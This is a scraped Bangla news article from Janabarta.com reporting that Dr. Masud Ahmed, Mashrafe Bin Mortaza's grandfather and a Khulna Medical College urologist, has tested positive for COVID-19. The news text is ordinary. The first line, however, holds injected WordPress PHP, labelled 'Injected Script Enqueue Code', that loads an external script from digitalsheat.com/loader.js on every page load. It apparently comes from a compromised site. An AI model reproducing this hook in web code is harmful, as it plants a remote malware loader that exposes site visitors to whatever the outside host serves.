// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site করোনায় আক্রান্ত মাশরাফির নানা ডা. মাসুদ - Janabarta.com

করোনায় আক্রান্ত মাশরাফির নানা ডা. মাসুদ

মাশরাফি বিন মর্তুজার নানা ডা. মাসুদ আহম্মেদ

নিজস্ব প্রতিবেদক: করোনাভাইরাসে আক্রান্ত হয়েছেন খুলনা মেডিকেল কলেজ হাসপাতালের ইউরোলজি বিভাগের সহাকারী অধ্যাপক ডা. মাসুদ আহম্মেদ। তিনি জাতীয় দলের ক্রিকেটার ও নড়াইল-২ আসনের সংসদ সদস্য মাশরাফি বিন মর্তুজার নানা। গতকাল রাতে ডা. মাসুদের আক্রান্ত হওয়ার বিষয়টি নিশ্চিত করেন মাশরাফি।

ডা. মাসুদ আহম্মেদ খুলনা মেডিকেলে চিকিৎসক হিসেবে কাজ করলেও তার পরিবার থাকে ঢাকায়। দেশে করোনাভাইরাস ছড়িয়ে পড়ার প্রেক্ষিতে পরিবারের পক্ষ থেকে ঢাকায় চলে আসতে বলা হলেও তিনি আসেননি। দেশের এই ক্রান্তিকালে নিজেকে দায়িত্ব থেকে সরিয়ে নিতে অস্বীকৃতি জানান। তারপর থেকে তিনি চিকিৎসা দিয়ে আসছিলেন। অসুস্থ বোধ করায় নমুনা পরীক্ষার পর গতকাল তার কভিড-১৯ পজিটিভ এসেছে।

মাশরাফি বিন মর্তুজা বলেন, আক্রান্ত হলেও নানা মোটামুটি ভালো আছেন। গায়ে হালকা জ্বর আছে। আশাকরি দ্রুত সুস্থ হয়ে উঠবেন তিনি। আপনারা সবাই দোয়া করবেন।’